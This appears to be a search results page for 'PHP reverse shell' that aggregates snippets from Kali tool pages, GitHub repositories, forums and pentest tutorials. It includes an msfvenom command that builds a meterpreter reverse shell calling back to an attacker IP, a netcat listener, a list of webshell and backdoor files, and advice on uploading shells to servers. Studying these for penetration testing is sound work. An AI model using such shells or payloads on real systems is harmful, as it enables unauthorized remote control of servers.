Kali Linux
kali.org › tools › webshells
webshells | Kali Linux Tools
December 9, 2025 - Webshells Usage Examples root@kali:~# tree /usr/share/webshells/ /usr/share/webshells/ ├── asp │ ├── cmd-asp-5.1.asp │ └── cmdasp.asp ├── aspx │ └── cmdasp.aspx ├── cfm │ └── cfexec.cfm ├── jsp │ ├── cmdjsp.jsp │ └── jsp-reverse.jsp ├── perl │ ├── perlcmd.cgi │ └── perl-reverse-shell.pl └── php ├── findsock.c ├── php-backdoor.php ├── php-findsock-shell.php ├── php-reverse-shell.php ├── qsd-php-backdoor.php └── simple-backdoor.php 6 directories, 14 files root@kali:~#
GitHub
github.com › ivan-sincek › php-reverse-shell
GitHub - ivan-sincek/php-reverse-shell: PHP shells that work on Linux OS, macOS, and Windows OS. · GitHub
Just a little refresh on the popular PHP reverse shell script pentestmonkey/php-reverse-shell. Credits to the original author! Works on Linux OS and macOS with /bin/sh and Windows OS with cmd.exe. Script will automatically detect the underlying OS. Works with both, ncat and multi/handler. Tested on: XAMPP for Linux v7.3.19 with PHP v7.3.19 on Kali Linux v2020.2 (64-bit), XAMPP for OS X v7.4.10 with PHP v7.4.10 on macOS Catalina v10.15.6 (64-bit), XAMPP for Windows v7.4.3 with PHP v7.4.3 on Windows 10 Enterprise OS (64-bit), Docker image nouphet/docker-php4 with PHP v4.4.0, Docker image steeze/php52-nginx with PHP v5.2.17.
Starred by 532 users
Forked by 155 users
Languages PHP
php Reverse Shell - Off-topic - Hack The Box :: Forums
Can anyone help me with this issue: I get the reverse shell from my attacking/kali machine. Don’t know what I am doing wrong it used to work earlier. I am uploading shell on web server with sar2HTML 3.2 vulnerability. I am using wget. I see that file is uploaded on server but when I browse ... More on forum.hackthebox.com
reverse shell php
For number 2 you mixed a command line reverse shell that gets executed by php (that’s what the „php -r“ stands for) with php script tags that get executed automatically. If you do just &3 2>&3"); ?> without php -r and without quotes it has a better chance to work More on reddit.com
PHP reverse shell is not working.
Your kali machine is running PHP. When DVWA calls out to request the file, your kali machine executes the PHP. You have essentially created a backdoor on your Kali system. When you serve the file, do not have PHP running on your web server. Disable in in apache or serve the file with something like Python simple HTTP server so it just gets served as static text. More on reddit.com
windows php reverse shell
https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php This is like the best reverse shell for any OS. https://www.revshells.com/ Also this site is very useful More on reddit.com
Videos
15:37
Web Shell Uploading Techniques & Exploitation Using Kali Linux ...
14:02
Local File Inclusion Using Kali Web Shells PHP Scripts - YouTube
11:42
Reverse Shell with Meterpreter & Metasploit - Kali Linux Tutorial ...
08:21
P0wny Shell || Best PHP reverse shell - YouTube
05:09
PHP Reverse Shell en DVWA en Kali Linux - YouTube
Create a Reverse Shell Using a File Upload
OffSec
offsec.com › home › kali linux › staged payloads from kali linux | pt phone home – php
Staged Payloads from Kali Linux | OffSec
July 29, 2024 - We will use a web call from our shellcode runner to retrieve and format this payload so that we can inject it into our payload to achieve a successful meterpreter reverse shell. Similar to before, our shellcode runner will include a download cradle that will retrieve our staged payload from our PHP page, except in this instance we’ll be pulling down shellcode. We’ll start with generating our shellcode using msfvendon · ┌──(kali㉿kali)-[~] └─$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.21 LPORT=443 EXITFUNC=thread -f ps1
Pentestmonkey
pentestmonkey.net › tools › web-shells › php-reverse-shell
php-reverse-shell | pentestmonkey
It doesn’t seem to on the systems that I’ve tested it on (Gentoo Linux only so far). Additionally the PHP script attempts to daemonise itself and dissociate from the parent process to avoid this (though it rarely works in practise). Your browser will appear to hang when you access the reverse shell.
High on Coffee
highon.coffee › blog › reverse-shell-cheat-sheet
Reverse Shell Cheat Sheet: PHP, ASP, Netcat, Bash & Python
February 27, 2022 - root@kali:~# nc -nvlp 80 nc: listening on :: 80 ... nc: listening on 0.0.0.0 80 ... If you're attacking machine is behing a NAT router, you'll need to setup a port forward to the attacking machines IP / Port. ATTACKING-IP is the machine running your listening netcat session, port 80 is used in all examples below (for reasons mentioned above). The following section contains PHP reverse shells that have been tested working.
Kali Linux
kali.org › tools › b374k
b374k | Kali Linux Tools
December 9, 2025 - Script execution (php, perl, Python, ruby, java, node.js, c) Give you shell via bind/reverse shell connect · Simple packet crafter · Connect to DBMS (MySQL, mssql, oracle, sqlite, PostgreSQL, and many more using ODBC or PDO) SQL Explorer · Process list/Task manager ·
YouTube
youtube.com › watch
Learn Kali Linux Episode #72: Uploading a Reverse Shell to a Web Server - YouTube
Get The Complete Ethical Hacking Course Bundle! http://josephdelgadillo.com/product/hacking-bundle-2017/ Enroll in our newest course! https://www.udemy.com/e...
Published June 27, 2018
Hack The Box
forum.hackthebox.com › off-topic
php Reverse Shell - Off-topic - Hack The Box :: Forums
January 24, 2021 - Can anyone help me with this issue: I get the reverse shell from my attacking/kali machine. Don’t know what I am doing wrong it used to work earlier. I am uploading shell on web server with sar2HTML 3.2 vulnerability. I am using wget. I see that file is uploaded on server but when I browse ...
GitHub
github.com › pentestmonkey › php-reverse-shell
GitHub - pentestmonkey/php-reverse-shell · GitHub
Starred by 2.8K users
Forked by 1.9K users
Languages PHP
101Labs
101labs.net › comptia-security › lab-41-getting-a-reverse-shell-on-a-server-through-a-file-upload
Lab 41 – Getting a reverse shell on a server through a file upload - 101Labs.net
March 1, 2024 - Let’s go to the “/uploads” page and click the “phpshell.phtml” file to make it run. When the code runs, it will establish a TCP connection to port 1234 of our Kali machine. Remember, this port is already being listened to by netcat. Return to the terminal where netcat is running. You will see that you now have a shell on the server.
Kali Linux
kalilinuxtutorials.com › home › kali linux › reverse shell cheat sheet 2019
Reverse Shell Cheat Sheet 2019 - Kalilinuxtutorials
December 3, 2019 - If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell. Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared.
Yeah Hub
yeahhub.com › home › getting reverse shell with php, python, perl and bash
Getting Reverse Shell with PHP, Python, Perl and Bash - Yeah Hub
July 30, 2025 - The goal is to have unique commands to run on the machine to control to get the reverse-shell, with redirection of standard input, standard output and error output. Each order is classified by technology/language. For each of them, the listener must place his machine in listening on a specific port. This step is often done by the utility of the sockets named “nectat“, available under Windows/Linux. Command to execute on the listener side on windows machine: ... For demonstrating this, we’ve two OS (Kali Linux and Windows 10) and in windows machine, netcat (nc) utility is already installed under c:\nc> directory.